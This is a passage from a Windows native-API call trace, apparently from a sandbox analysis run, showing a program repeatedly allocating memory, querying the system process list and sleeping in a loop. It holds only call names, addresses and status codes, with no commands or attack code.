Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.442] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.459] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.474] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.490] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.505] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.520] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.536] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.553] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.567] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.583] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.600] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.615] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.630] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.645] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.661] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.677] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.693] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.708] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.724] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.739] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.754] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 